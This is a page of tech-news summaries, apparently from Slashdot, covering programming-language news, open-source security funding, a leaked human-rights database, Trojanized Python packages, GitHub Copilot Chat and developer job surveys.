"It allows developers to think about work in logical groups while taking advantage of both traditional and virtual threads." Available in preview in Java 21, structured concurrency is a key aspect of Java's future, so now is a good time to start working with it... Java's thread model makes it a strong contender among concurrent languages, but multithreading has always been inherently tricky. Structured concurrency allows you to use multiple threads with structured programming syntax. In essence, it provides a way to write concurrent software using familiar program flows and constructs. This lets developers focus on the business at hand, instead of the orchestration of threading.

As the JEP for structured concurrency says, "If a task splits into concurrent subtasks then they all return to the same place, namely the task's code block." Virtual threads, now an official feature of Java, create the possibility of cheaply spawning threads to gain concurrent performance. Structured concurrency provides the simple syntax to do so. As a result, Java now has a unique and highly-optimized threading system that is also easy to understand...

Between virtual threads and structured concurrency, Java developers have a compelling new mechanism for breaking up almost any code into concurrent tasks without much overhead... Any time you encounter a bottleneck where many tasks are occurring, you can easily hand them all off to the virtual thread engine, which will find the best way to orchestrate them. The new thread model with structured concurrency also makes it easy to customize and fine-tune this behavior. It will be very interesting to see how developers use these new concurrency capabilities in our applications, frameworks, and servers going forward.

It involves a new class StructuredTaskScope located in the java.util.concurrent library. (InfoWorld points out that "you'll need to use --enable-preview and --source 21 or --source 22 to enable structured concurrency.")

Their reporter shared an example on GitHub, and there are more examples in the Java 21 documentation. "The structured concurrency documentation includes an example of collecting subtask results as they succeed or fail and then returning the results."
Security

Rust Foundation Plans Training/Certification Program. Security Initiative Funded Through 2024 (rust-lang.org) 4

The Linux Foundation's own "Open Software Security foundation" has an associated project called Alpha-Omega funded by Microsoft, Google, and Amazon with a mission to catalyze sustainable security improvements to critical open source projects and ecosystems.

It was established nearly two years ago in February of 2022 — and this month announced plans to continue supporting the Rust Foundation Security Initiative: 2022 was also the first full year of operation for the Rust Foundation — an independent nonprofit dedicated to stewarding the Rust programming language and supporting its global community. Given the considerable growth and rising popularity of the Rust programming language in recent years, it has never been more critical to have a healthy and well-funded foundation in place to help ensure the safety and security of this important language.

When the Rust Foundation emerged, OpenSSF recognized a shared vision of global open source security baked into their organizational priorities from day one. These shared security values were the driving force behind Alpha-Omega's decision to grant $460k USD to the Rust Foundation in 2022. This funding helped underwrite their Security Initiative — a program dedicated to improving the state of security within the Rust programming language ecosystem and sowing security best practices within the Rust community. The Security Initiative began in earnest this past January and has now been in operation for a full year with many achievements to note and exciting plans in development.

While security is a clear priority of the Rust language itself and can be seen in its memory safety-critical features, the Rust Project cannot reasonably be expected to foster long term, sustainable security without proper support and funding. Indeed, there is still a pervasive attitude across technology that cybersecurity is being managed and prioritized by "someone else." The unfortunate impact of this attitude is that critical security work often falls on overburdened and under-resourced open source maintainers. By prioritizing the Security Initiative during their first full year in operation, the Rust Foundation has taken on the responsibility of overseeing — and supporting — security improvements within the Rust ecosystem while ensuring meaningful progress...

Alpha-Omega is excited to announce our second year of supporting the Rust Foundation Security Initiative. We believe that this funding will build on the good work and momentum established by the Rust Foundation in 2023. Through this partnership, we are helping relieve maintainer burdens while paving an important path towards a healthier and more secure future within the Rust ecosystem.

Meanwhile, this month the Rust Foundation announced that downloads from Rust's package repository crates.io have now reached 45 billion — and that the foundation is "committed to facilitating the healthy growth of Rust through funding and resources for the community and the Project.

"After conducting initial planning and research and getting approval from our board of directors, we are pleased to announce our intention to help fulfill this commitment by developing a Rust Foundation training and certification program." We continue to be supportive of anyone creating Rust training and education materials. In fact, we are proud to have provided funding to a few individuals involved in this work via our Community Grants Program. Our team is also aware that commercial Rust training courses already exist and that global training entities are already developing their own Rust-focused programs. Given the value of Rust in professional open source, this makes sense. However, we are eager to introduce a program that will allow us to direct profits back into the Rust ecosystem.

As a nonprofit organization, we sit in a unique position thanks to the tools, connections, insights, administrative support, and resources at our disposal — all of which will add value to course material aimed at professional development and adoption. We see our forthcoming program as one tool of many that can be used to verify skills for prospective employers, and for those employers to build out their professional teams of Rust expertise. We will remain supportive of existing training programs offered by Rust Foundation member companies and we'll look for ways to ensure this remains the case as program development progresses... There is no set launch date for the Rust Foundation training and certification program yet, but we plan to continue laying high-quality groundwork in Q4 of 2023 and the first half of 2024.

Programming

BBC BASIC Is Back In a Big Way (hackaday.com) 134

An anonymous reader quotes a report from Hackaday: The BBC has a long history of teaching the world about computers. The broadcaster's name was proudly displayed on the BBC Micro, and BBC Basic was the programming language developed especially for that computer. Now, BBC Basic is back and running on a whole mess of modern platforms. BBC Basic for SDL 2.0 will run on Windows, MacOS, x86 Linux, and even Raspberry Pi OS, Android, and iOS. Desktop versions of the programming environment feature a BASIC editor that has syntax coloring for ease of use, along with luxury features like search and replace that weren't always available at the dawn of the microcomputer era. Meanwhile, the smartphone versions feature a simplified interface designed to work better in a touchscreen environment.

It's weird to see, but BBC Basic can actually do some interesting stuff given the power of modern hardware. It can address up to 256 MB of memory, and work with far more advanced graphical assets than would ever have been possible on the original BBC Micro. If you honed your programming skills on that old metal, you might be impressed with what they can achieve with BBC Basic in a new, more powerful context.

PHP

PHP 8.0 End of Life Is Today, November 26, 2023 (sysadminafterdark.com) 40

Slashdot reader sysadminafterdark writes: Released on November 26, 2020, PHP 8 brought many optimizations and powerful features to the language. Fast forward to today, and PHP 8 is getting the boot in favor of 8.1, 8.2, and 8.3 with 8.4 in development. This leaves some websites at risk of breaking and potential security issues. Hearing of this news, I upgraded my own blog and wrote an article on how to add the Remi repository and update. I run Enterprise Linux (The best distro out there) so if you are standing up new boxes, just keep in mind the PHP in the repo is deprecated.
Python

How Python's New Security Developer Hopes To Help All Software Supply Chains (thenewstack.io) 23

Long-time Slashdot reader destinyland writes: The Linux Foundation recently funded a new "security developer in residence" position for Python. (It's funded through the Linux Foundation's own "Open Software Security foundation", which has a stated mission of partnering with open source project maintainers "to systematically find new, as-yet-undiscovered vulnerabilities in open source code, and get them fixed to improve global software supply chain security.") The position went to the lead maintainer for the HTTP client library urllib3, the most downloaded package on the Python Package Index with over 10 billion downloads. But he hopes to create a ripple effect by demonstrating the impact of security investments in critical communities — ultimately instigating a wave of improvements to all software supply chains. (And he's also documenting everything for easy replication by other communities...)

So far he's improved the security of Python's release processes with signature audits and security-hardening automation. But he also learned that CVE numbers were being assigned to newly-discovered vulnerabilities by the National Cyber Security Division of America's Department of Homeland Security — often without talking to anyone at the Python project. So by August he'd gotten the Python Software Foundation authorized as a CVE Numbering Authority, which should lead to more detailed advisories (including remediation information), now reviewed and approved by Python's security response teams.

"The Python Software wants to help other Open Source organizations, and will be sharing lessons learned," he writes in a blog post. And he now says he's already been communicating with the Curl program about his experiences to help them take the same step, and even authored a guide to the process for other open source projects.

Games

GameMaker Ditches Subscription Model For Indie Developers (theverge.com) 9

GameMaker announced that it will be free to use for noncommercial, non-console projects, breaking away from Unity and its massive pricing controversy that saw game developers boycotting the engine. The company is also "eliminating its indie / creator tier monthly subscription fee in favor of a one-time paid licensing fee of $99," reports The Verge. "Additionally, if you're currently enrolled at the indie / creator tier and wish to pay the licensing fee, the subscription fees you've paid will be discounted from the price." The Verge: Russell Kay, head of GameMaker, said that the changes were a way for the company to express its thanks to users, explaining that, since 2021, GameMaker has seen its user base triple in size. Kay also had some subtle but effective shade for GameMaker's competitors. "We have seen other platforms making awkward moves with their pricing and terms, so we thought, what if we did the opposite, something that could actually be good for developers?" Kay wrote in the announcement.

Though customers currently enrolled in an enterprise-level subscription will see no changes to their plans, it seems like GameMaker is counting on the pricing update to draw more people to the software. "Our success is measured by the number of people making games!" Kay wrote.

Python

How Mojo Hopes to Revamp Python for an AI World (acm.org) 28

Python "come with downsides," argues a new article in Communications of the ACM. "Its programs tend to run slowly, and because it is inefficient at running processes in parallel, it is not well suited to some of the latest AI programming."

"Hoping to overcome those difficulties, computer scientist Chris Lattner set out to create a new language, Mojo, which offers the ease of use of Python, but the performance of more complex languages such as C++ or Rust." Lattner tells the site "we don't want to break Python, we want to make Python better," while software architect Doug Meil says Mojo is essentially "Python for AI... and it's going to be way faster in scale across multiple hardware platforms." Lattner teamed up with Tim Davis, whom he had met when they both worked for Google, to form Modular in January 2022. The company, where Lattner is chief executive officer and Davis chief product officer, provides support for companies working on AI and is developing Mojo.

A modern AI programming stack generally has Python on top, Lattner says, but because that is an inefficient language, it has C++ underneath to handle the implementation. The C++ then must communicate with performance accelerators or GPUs, so developers add a platform such as Compute Unified Device Architecture (CUDA) to make efficient use of those GPUs. "Mojo came from the need to unify these three different parts of the stack so that we could build a unified solution that can scale up and down," Lattner says. The result is a language with the same syntax as Python, so people used to programming in Python can adopt it with little difficulty, but which, by some measures, can run up to 35,000 times faster. For AI, Mojo is especially fast at performing the matrix multiplications used in many neural networks because it compiles the multiplication code to run directly on the GPU, bypassing CUDA...

"Increasingly, code is not being written by computer programmers. It's being written by doctors and journalists and chemists and gamers," says Jeremy Howard, an honorary professor of computer science at the University of Queensland, Australia, and a co-founder of fast.ai, a. "All data scientists write code, but very few data scientists would consider themselves professional computer programmers." Mojo attempts to fill that need by being a superset of Python. A program written in Python can be copied into Mojo and will immediately run faster, the company says. The speedup comes from a variety of factors. For instance, Mojo, like other modern languages, enables threads, small tasks that can be run simultaneously, rather than in sequence. Instead of using an interpreter to execute code as Python does, Mojo uses a compiler to turn the code into assembly language.

Mojo also gives developers the option of using static typing, which defines data elements and reduces the number of errors... "Static behavior is good because it leads to performance," Lattner says. "Static behavior is also good because it leads to more correctness and safety guarantees."

Python creator Guido van Rossum "says he is interested to watch how Mojo develops and whether it can hit the lofty goals Lattner is setting for it..." according to the article, "but he emphasizes that the language is in its early stages and, as of July 2023, Mojo had not yet been made available for download."


In June, Lattner did an hour-long interview with the TWIML AI podcast. And in 2017 Chris Lattner answered questions from Slashdot's readers.
Android

Kotlin Keeps Climbing TIOBE's Programming Language Popularity Index (infoworld.com) 52

An anonymous reader shared this report from InfoWorld: JetBrains' Kotlin language, a Java rival endorsed by Google for Android mobile development, continues to scale up Tiobe's index of language popularity, reaching the 15th spot in the November 2023 rankings...

Software quality services company Tiobe cites Kotlin advantages including interoperability with Java and unrivaled Android accommodations as reasons for the language's rise. Kotlin, Tiobe CEO Paul Jansen said, also fits in with a modern programming culture of expressive languages that have a strong type system and avoid null pointer exceptions by design. "Based on my experience, I am pretty sure Kotlin can reach a top 10 position," Jansen said. It remains to be seen if it can ever scale as high as a top four slot, he added...

In the rival Pypl Popularity of Programming languages index this month, Kotlin was ranked 13th with a 1.76% share, having slipped slightly year-over-year.

Kotlin's rank on the TIOBE index rose three positions in the last month — after rising two positions the month before. TIOBE's CEO says the language has now achieved its highest ranking ever on the index, surpassing 2017's "first wave of Kotlin popularity...when Google announced first class support for Kotlin on Android."

Rust now ranks #20 on the index, behind Delphi/Object Pascal, Swift, Ruby, and R.

Here are TIOBE's November rankings for the top 20 most popular programming languages:
  1. Python
  2. C
  3. C++
  4. Java
  5. C#
  6. JavaScript
  7. PHP
  8. Visual Basic
  9. SQL
  10. Assembly Language
  11. Scratch
  12. Fortran
  13. Go
  14. MATLAB
  15. Kotlin
  16. Delphi/Object Pascal
  17. Swift
  18. Ruby
  19. R
  20. Rust

Python

Python Community Announces Podcast, Developer's Survey, PyCharm Discount (blogspot.com) 19

The Python community is staying busy.
  • Three weeks ago a new podcast launched with Python core developer/steering council member Pablo Galindo and Python developer-in-residence Łukasz Langa.

Databases

Online Atrocity Database Exposed Thousands of Vulnerable People In Congo (theintercept.com) 6

An anonymous reader quotes a report from The Intercept: A joint project of Human Rights Watch and New York University to document human rights abuses in the Democratic Republic of the Congo has been taken offline after exposing the identities of thousands of vulnerable people, including survivors of mass killings and sexual assaults. The Kivu Security Tracker is a "data-centric crisis map" of atrocities in eastern Congo that has been used by policymakers, academics, journalists, and activists to "better understand trends, causes of insecurity and serious violations of international human rights and humanitarian law," according to the deactivated site. This includes massacres, murders, rapes, and violence against activists and medical personnel by state security forces and armed groups, the site said. But the KST's lax security protocols appear to have accidentally doxxed up to 8,000 people, including activists, sexual assault survivors, United Nations staff, Congolese government officials, local journalists, and victims of attacks, an Intercept analysis found. Hundreds of documents -- including 165 spreadsheets -- that were on a public server contained the names, locations, phone numbers, and organizational affiliations of those sources, as well as sensitive information about some 17,000 "security incidents," such as mass killings, torture, and attacks on peaceful protesters.

The data was available via KST's main website, and anyone with an internet connection could access it. The information appears to have been publicly available on the internet for more than four years. [...] The spreadsheets, along with the main KST website, were taken offline on October 28, after investigative journalist Robert Flummerfelt, one of the authors of this story, discovered the leak and informed Human Rights Watch and New York University's Center on International Cooperation. HRW subsequently assembled what one source close to the project described as a "crisis team." Last week, HRW and NYU's Congo Research Group, the entity within the Center on International Cooperation that maintains the KST website, issued a statement that announced the takedown and referred in vague terms to "a security vulnerability in its database," adding, "Our organizations are reviewing the security and privacy of our data and website, including how we gather and store information and our research methodology." The statement made no mention of publicly exposing the identities of sources who provided information on a confidential basis. [...] The Intercept has not found any instances of individuals affected by the security failures, but it's currently unknown if any of the thousands of people involved were harmed.
"We deeply regret the security vulnerability in the KST database and share concerns about the wider security implications," Human Rights Watch's chief communications officer, Mei Fong, told The Intercept. Fong said in an email that the organization is "treating the data vulnerability in the KST database, and concerns around research methodology on the KST project, with the utmost seriousness." Fong added, "Human Rights Watch did not set up or manage the KST website. We are working with our partners to support an investigation to establish how many people -- other than the limited number we are so far aware of -- may have accessed the KST data, what risks this may pose to others, and next steps. The security and confidentiality of those affected is our primary concern."
Programming

Developers Can't Seem To Stop Exposing Credentials in Publicly Accessible Code (arstechnica.com) 59

Despite more than a decade of reminding, prodding, and downright nagging, a surprising number of developers still can't bring themselves to keep their code free of credentials that provide the keys to their kingdoms to anyone who takes the time to look for them. From a report: The lapse stems from immature coding practices in which developers embed cryptographic keys, security tokens, passwords, and other forms of credentials directly into the source code they write. The credentials make it easy for the underlying program to access databases or cloud services necessary for it to work as intended. [...]

The number of studies published since following the revelations underscored just how common the practice had been and remained in the years immediately following Uber's cautionary tale. Sadly, the negligence continues even now. Researchers from security firm GitGuardian this week reported finding almost 4,000 unique secrets stashed inside a total of 450,000 projects submitted to PyPI, the official code repository for the Python programming language. Nearly 3,000 projects contained at least one unique secret. Many secrets were leaked more than once, bringing the total number of exposed secrets to almost 57,000.

Programming

A Coder Considers the Waning Days of the Craft (newyorker.com) 158

Programmer and writer James Somers, writing for New Yorker: Yes, our jobs as programmers involve many things besides literally writing code, such as coaching junior hires and designing systems at a high level. But coding has always been the root of it. Throughout my career, I have been interviewed and selected precisely for my ability to solve fiddly little programming puzzles. Suddenly, this ability was less important.

I had gathered as much from Ben (friend of the author), who kept telling me about the spectacular successes he'd been having with GPT-4. It turned out that it was not only good at the fiddly stuff but also had the qualities of a senior engineer: from a deep well of knowledge, it could suggest ways of approaching a problem. For one project, Ben had wired a small speaker and a red L.E.D. light bulb into the frame of a portrait of King Charles, the light standing in for the gem in his crown; the idea was that when you entered a message on an accompanying Web site the speaker would play a tune and the light would flash out the message in Morse code. (This was a gift for an eccentric British expat.) Programming the device to fetch new messages eluded Ben; it seemed to require specialized knowledge not just of the microcontroller he was using but of Firebase, the back-end server technology that stored the messages. Ben asked me for advice, and I mumbled a few possibilities; in truth, I wasn't sure that what he wanted would be possible. Then he asked GPT-4. It told Ben that Firebase had a capability that would make the project much simpler. Here it was -- and here was some code to use that would be compatible with the microcontroller.

Afraid to use GPT-4 myself -- and feeling somewhat unclean about the prospect of paying OpenAI twenty dollars a month for it -- I nonetheless started probing its capabilities, via Ben. We'd sit down to work on our crossword project, and I'd say, "Why don't you try prompting it this way?" He'd offer me the keyboard. "No, you drive," I'd say. Together, we developed a sense of what the A.I. could do. Ben, who had more experience with it than I did, seemed able to get more out of it in a stroke. As he later put it, his own neural network had begun to align with GPT-4's. I would have said that he had achieved mechanical sympathy. Once, in a feat I found particularly astonishing, he had the A.I. build him a Snake game, like the one on old Nokia phones. But then, after a brief exchange with GPT-4, he got it to modify the game so that when you lost it would show you how far you strayed from the most efficient route. It took the bot about ten seconds to achieve this. It was a task that, frankly, I was not sure I could do myself.

In chess, which for decades now has been dominated by A.I., a player's only hope is pairing up with a bot. Such half-human, half-A.I. teams, known as centaurs, might still be able to beat the best humans and the best A.I. engines working alone. Programming has not yet gone the way of chess. But the centaurs have arrived. GPT-4 on its own is, for the moment, a worse programmer than I am. Ben is much worse. But Ben plus GPT-4 is a dangerous thing.

Education

How 'Hour of Code' Will Teach Students About Issues with AI (code.org) 17

Launched in 2013, "Hour of Code" is an annual tradition started by the education non-profit Code.org (which provides free coding lessons to schools). Its FAQ describes the December event for K-12 students as "a worldwide effort to celebrate computer science, starting with 1-hour coding activities," and over 100 million schoolkids have participated over the years.

This year's theme will be "Creativity With AI," and the "computer vision" lesson includes a short video (less than 7 minutes) featuring a Tesla Autopilot product manager from its computer vision team. "I build self-driving cars," they say in the video. "Any place where there can be resources used more efficiently I think is a place where technology can play a role. But of course one of the best, impactful ways of AI, I hope, is through self-driving cars." (The video then goes on to explain how lots of training data ultimately generates a statistical model, "which is just a fancy way of saying, a guessing machine.")

The 7-minute video is part of a larger lesson plan (with a total estimated time of 45 minutes) in which students tackle a fun story problem. If a sports arena's scoreboard is showing digital numbers, what series of patterns would a machine-vision system have to recognize to identify each digit? (Students are asked to collaborate in groups.) And it's just one of seven 45-minute lessons, each one accompanied by a short video. (The longest video is 7 minutes and 28 seconds, and all seven videos, if watched back-to-back, would run for about 31 minutes.)

Not all the lessons involve actual coding, but the goal seems to be familiarizing students (starting at the 6th grade level) with the artificial intelligence of today, and the issues it raises. The second-to-last lesson is titled "Algorithmic Bias" — with a video including interviews with an ethicist at OpenAI and professors focused on AI from both MIT and Stanford. And the last lesson — "Our AI Code of Ethics" — challenges students to assemble documents and videos on AI-related "ethical pitfalls," and then pool their discoveries into an educational resource "for AI creators and legislators everywhere."

This year's installment is being billed as "the largest learning event in history." And it's scheduled for the week of December 4 so it coincides with "Computer Science Education Week" (a CS-education event launched in 2009 by the Association for Computing Machinery, with help from partners including Intel, Microsoft, Google, and the National Science Foundation).
Security

Highly Invasive Backdoors Hidden in Python Obfuscation Packages, Downloaded by 2,348 Developers (arstechnica.com) 50

The senior security editor at Ars Technica writes: Highly invasive malware targeting software developers is once again circulating in Trojanized code libraries, with the latest ones downloaded thousands of times in the last eight months, researchers said Wednesday.

Since January, eight separate developer tools have contained hidden payloads with various nefarious capabilities, security firm Checkmarx reported. The most recent one was released last month under the name "pyobfgood." Like the seven packages that preceded it, pyobfgood posed as a legitimate obfuscation tool that developers could use to deter reverse engineering and tampering with their code. Once executed, it installed a payload, giving the attacker almost complete control of the developer's machine. Capabilities include:


- Exfiltrate detailed host information
- Steal passwords from the Chrome web browser
- Set up a keylogger
- Download files from the victim's system
- Capture screenshots and record both screen and audio
- Render the computer inoperative by ramping up CPU usage, inserting a batch script in the startup directory to shut down the PC, or forcing a BSOD error with a Python script
- Encrypt files, potentially for ransom
- Deactivate Windows Defender and Task Manager
- Execute any command on the compromised host


In all, pyobfgood and the previous seven tools were installed 2,348 times. They targeted developers using the Python programming language... Downloads of the package came primarily from the US (62%), followed by China (12%) and Russia (6%).

Ars Technica concludes that "The never-ending stream of attacks should serve as a cautionary tale underscoring the importance of carefully scrutinizing a package before allowing it to run."
Programming

Why Chrome Enabled WebAssembly Garbage Collection (WasmGC) By Default (chrome.com) 56

In Chrome, JavaScript (and WebAssembly) code are both executed by Google's open source V8 engine — which already has garbage-collecting capabilities. "This means developers making use of, for example, PHP compiled to Wasm, end up shipping a garbage collector implementation of the ported language (PHP) to the browser that already has a garbage collector," writes Google developer advocate Thomas Steiner, "which is as wasteful as it sounds."

"This is where WasmGC comes in." WebAssembly Garbage Collection (or WasmGC) is a proposal of the WebAssembly Community Group [which] adds struct and array heap types, which means support for non-linear memory allocation... In simplified terms, this means that with WasmGC, porting a programming language to WebAssembly means the programming language's garbage collector no longer needs to be part of the port, but instead the existing garbage collector can be used.
Sometime on Halloween, Steiner wrote that in Chrome, WebAssembly garbage collection is now enabled by default. But then he explored what this means for high-level programming languages (with their own built-in garbage collection) being compiled into WebAssembly: To verify the real-world impact of this improvement, Chrome's Wasm team has compiled versions of the Fannkuch benchmark (which allocates data structures as it works) from C, Rust, and Java. The C and Rust binaries could be anywhere from 6.1 K to 9.6 K depending on the various compiler flags, while the Java version is much smaller at only 2.3 K! C and Rust do not include a garbage collector, but they do still bundle malloc/free to manage memory, and the reason Java is smaller here is because it doesn't need to bundle any memory management code at all. This is just one specific example, but it shows that WasmGC binaries have the potential of being very small, and this is even before any significant work on optimizing for size.
The blog post includes two examples of WasmGC-ported programming languages in action:
  • "One of the first programming languages that has been ported to Wasm thanks to WasmGC is Kotlin in the form of Kotlin/Wasm."
  • "The Dart and Flutter teams at Google are also preparing support for WasmGC. The Dart-to-Wasm compilation work is almost complete, and the team is working on tooling support for delivering Flutter web applications compiled to WebAssembly."

AI

GitHub Announces Its 'Refounding' on Copilot, Including an AI-Powered 'Copilot Chat' Assistant (github.blog) 33

This week GitHub announced the approaching general availability of the GPT-4-powered GitHub Copilot Chat in December "as part of your existing GitHub Copilot subscription" (and "available at no cost to verified teachers, students, and maintainers of popular open source projects.")

And this "code-aware guidance and code generation" will also be integrated directly into github.com, "so developers can dig into code, pull requests, documentation, and general coding questions with Copilot Chat providing suggestions, summaries, analysis, and answers." With GitHub Copilot Chat we're enabling the rise of natural language as the new universal programming language for every developer on the planet. Whether it's finding an error, writing unit tests, or helping debug code, Copilot Chat is your AI companion through it all, allowing you to write and understand code using whatever language you speak...

Copilot Chat uses your code as context, and is able to explain complex concepts, suggest code based on your open files and windows, help detect security vulnerabilities, and help with finding and fixing errors in code, terminal, and debugger...

With the new inline Copilot Chat, developers can chat about specific lines of code, directly within the flow of their code and editor.

InfoWorld notes it will chat in "whatever language a developer speaks." (And that Copilot Chat will also be available in GitHub's mobile app.) But why wait until December? GitHub's blog post says that Copilot Chat "will come to the JetBrains suite of IDEs, available in preview today."

GitHub also plans to introduce "slash commands and context variables" for GitHub Copilot, "so fixing or improving code is as simple as entering /fix and generating tests now starts with /tests."

"With Copilot in the code editor, in the CLI, and now Copilot Chat on github.com and in our mobile app, we are making Copilot ubiquitous throughout the software development lifecycle and always available in all of GitHub's surface areas..."

CNBC adds that "Microsoft-owned GitHub" also plans to introduce "a more expensive Copilot assistant" in February "for developers inside companies that can explain and provide recommendations about internal source code."

Wednesday's blog post announcing these updates was written by GitHub's CEO, who seemed to be predicting an evolutionary leap into a new future. "Just as GitHub was founded on Git, today we are re-founded on Copilot." He promised they'd built on their vision of a future "where AI infuses every step of the developer lifecycle." Open source and Git have fundamentally transformed how we build software. It is now evident that AI is ushering in the same sweeping change, and at an exponential pace... We are certain this foundational transformation of the GitHub platform, and categorically new way of software development, is necessary in a world dependent on software. Every day, the world's developers balance an unsustainable demand to both modernize the legacy code of yesterday and build our digital tomorrow. It is our guiding conviction to make it easier for developers to do it all, from the creative spark to the commit, pull request, code review, and deploy — and to do it all with GitHub Copilot deeply integrated into the developer experience.
And if you're worried about the security of AI-generated code... Today, GitHub Copilot applies an LLM-based vulnerability prevention system that blocks insecure coding patterns in real-time to make GitHub Copilot's suggestions more secure. Our model targets the most common vulnerable coding patterns, including hardcoded credentials, SQL injections, and path injections. GitHub Copilot Chat can also help identify security vulnerabilities in the IDE, explain the mechanics of a vulnerability with its natural language capabilities, and suggest a specific fix for the highlighted code.
But for Enterprise accounts paying for GitHub Advanced Security, there's also an upgrade coming: "new AI-powered application security testing features designed to detect and remediate vulnerabilities and secrets in your code." (It's already available in preview mode.)

GitHub even announced plans for a new AI assistant in 2024 that generates a step-by-step plan for responding to GitHub issues. (GitHub describes it as "like a pair programming session with a partner that knows about every inch of the project, and can follow your lead to make repository-wide changes from the issue to the pull request with the power of AI.")

CNBC notes that AI-powered coding assistants "are still nascent, though, with less than 10% enterprise adoption, according to Gartner, a technology industry research firm."

But last month Microsoft CEO Satya Nadella told analysts GitHub Copilot already had one million paying users...

And GitHub's blog post concludes, "And we're just getting started."
Programming

Do Programming Certifications Still Matter? (infoworld.com) 101

With programmers in high demand, InfoWorld asks if it's really worthwhile for software developers to pursue certifications. "Based on input from those in the field, company executives, and recruiters, the answer is a resounding yes."

"The primary benefit of certifications is to verify your skill sets," says Archie Payne, president of the recruiting firm CalTek Staffing... Certifications can be used to "reinforce the experience on your resume or demonstrate competencies beyond what you've done in the workplace in a prior role." Certifications show that you are committed to your field, invested in career growth, and connected to the broader technology landscape, Payne says. "Obtaining certification indicates that you are interested in learning new skills and continuing your learning throughout your career," he says...

In cases where multiple candidates are equally qualified, having a relevant certification can give one candidate an edge over others, says Aleksa Krstic, CTO at Localizely, a provider of a cloud-based translation platform. "When it comes to certifications in general, when we see a junior to mid-level developer armed with programming certifications, it's a big green light for our hiring team," says Michał Kierul, who is CEO of software company INTechHouse.

"It's not just about the knowledge they have gained," Kierul says. "It speaks volumes about their passion, their drive to excel, and their commitment to continuous learning outside their regular work domain. It underscores a key trait we highly value: the desire to grow, learn, and elevate oneself in the world of technology."

Android

Google Plans RISC-V Android Tools In 2024, Wants Developers To 'Be Ready' (arstechnica.com) 47

An anonymous reader quotes a report from Ars Technica: Android is slowly entering the RISC-V era. So far we've seen Google say it wants to give the up-and-coming CPU architecture "tier-1" support in Android, putting RISC-V on equal footing with Arm. Qualcomm has announced the first mass-market RISC-V Android chip, a still-untitled Snapdragon Wear chip for smartwatches. Now Google has announced a timeline for developer tools via the Google Open Source Blog. The last post is titled "Android and RISC-V: What you need to know to be ready."

Getting the Android OS and app ecosystem to support a new architecture is going to take an incredible amount of work from Google and developers, and these tools are laying the foundation for that work. First up, Google already has the "Cuttlefish" virtual device emulator running, including a gif of it booting up. This isn't the official "Android Emulator" -- which is targeted at app developers doing app development -- Cuttlefish is a hardware emulator for Android OS development. It's the same idea as the Android Emulator but for the bottom half of the tech stack -- the kernel, framework, and hardware bits. Cuttlefish lets Google and other Android OS contributors work on a RISC-V Android build without messing with an individual RISC-V device. Google says it's working well enough now that you can download and emulate a RISC-V device today, though the company warns that nothing is optimized yet.

The next step is getting the Android Emulator (for app developers) up and running, and Google says: "By 2024, the plan is to have emulators available publicly, with a full feature set to test applications for various device form factors!" The nice thing about Android is that most app code is written with no architecture in mind -- it's all just Java/Kotlin. So once the Android RunTime starts spitting out RISC-V code, a lot of app code should Just Work. That means most of the porting work will need to go into things written in the NDK, the native developer kit, like libraries and games. The emulator will still be great for testing, though.

Programming

79% of Developers are At Least Considering a New Job, Survey Finds (stackoverflow.blog) 36

"More developers are looking for or are open to a new job now compared to the last two years," writes Stack Overflow's senior analyst for market research and insights — citing the results of their latest survey of developers in 107 different countries.

"More than 1,000 developers responded to this year's survey about jobs and 79% are at least considering new opportunities if not actively looking." New insights from these survey results show that new tech talent and late-career developers are both more likely to be looking. New developers have increasingly switched jobs compared to early- and mid-career developers in the last three years... Interest in looking for a new job drops as developers get older for new to mid-career (44 and younger) respondents (86% to 74%), but picks back up for those 55 to 64 (88%). Late-career developers acknowledge curiosity about other companies as their second top reason to look for a new job this year behind "better salary," which all age groups rank as their top reason. Curiosity grew in importance for late-career developers since last year more than all other age groups (32% vs. 22%) and is more important to this group than reasons other groups ranked higher such as working with new technology and growth opportunities...

In our 2023 Developer Survey, we started asking about AI and the sentiment around it in our developer community; results were very similar when we checked in again through this pulse survey (70% are using AI or planning to). Developers may also feel less enthusiastic about learning opportunities now that AI tools are rapidly developing to help many be more productive in their jobs (30% cite this as the top benefit).

Other interesting findings from the survey:
  • Compared to the 2023 Developer Survey, 8% of developers have exited the technology industry and are increasingly filling roles in manufacturing and supply chain companies (11% vs. 7%)
  • Technology is the industry most developers currently work in (46%), followed by manufacturing/supply chain (14%) and financial services (13%)
  • New tech talent is onboarding at as many jobs by 24 as those up to 10 years their senior and this rapid experience cycle could rival the knowledge and experience of those they report to.

Python

Experimental Project Attempts a Python Virtual Shell for Linux (cjshayward.com) 62

Long-time Slashdot reader CJSHayward shares "an attempt at Python virtual shell."

The home-brewed project "mixes your native shell with Python with the goal of letting you use your regular shell but also use Python as effectively a shell scripting language, as an alternative to your shell's built-in scripting language... I invite you to explore and improve it!"

From the web site: The Python Virtual Shell (pvsh or 'p' on the command line) lets you mix zsh / bash / etc. built-in shell scripting with slightly modified Python scripting. It's kind of like Brython [a Python implementation for client-side web programming], but for the Linux / Unix / Mac command line...

The core concept is that all Python code is indented with tabs, with an extra tab at the beginning to mark Python code, and all shell commands (including some shell builtins) have zero tabs of indentation. They can be mixed line-by-line, offering an opportunity to use built-in zsh, bash, etc. scripting or Python scripting as desired.

The Python is an incomplete implementation; it doesn't support breaking a line into multiple lines. Nonetheless, this offers a tool to fuse shell- and Python-based interactions from the Linux / Unix / Mac command line.

Programming

Pope Francis Encourages More Children To Code 45

theodp writes: The BBC reports that Pope Francis has endorsed a global project aimed at getting more children into computer programming. The Code with Pope initiative, championed by Cosmose AI founder Miron Mironiuk, aims to bridge "the glaring disparities in education" across the globe by providing access to Python coding education through the free online learning platform Codeforia for students aged 11-15 across Europe, Africa and Latin America. Mironiuk will meet the Pope at the Vatican, but he admits he's not anticipating the pontiff to emulate his students in acquiring new skills. "I don't expect him to know Python very well," he said.

This is not the first time the Pope has encouraged young people to get into coding, having helped write a line of code together with tech-backed nonprofit Code.org in 2019. Pope Francis has also blessed AI's potential for good, meeting with Microsoft President Brad Smith (a Code.org Board member) to sign the Rome Call for AI Ethics early this year just ahead of Microsoft's $10B OpenAI investment and announcing "Artificial Intelligence and Peace" as the theme for World Day of Peace 2024 in August.
Businesses

SiFive Lays Off Hundreds of RISC-V Developers (tomshardware.com) 17

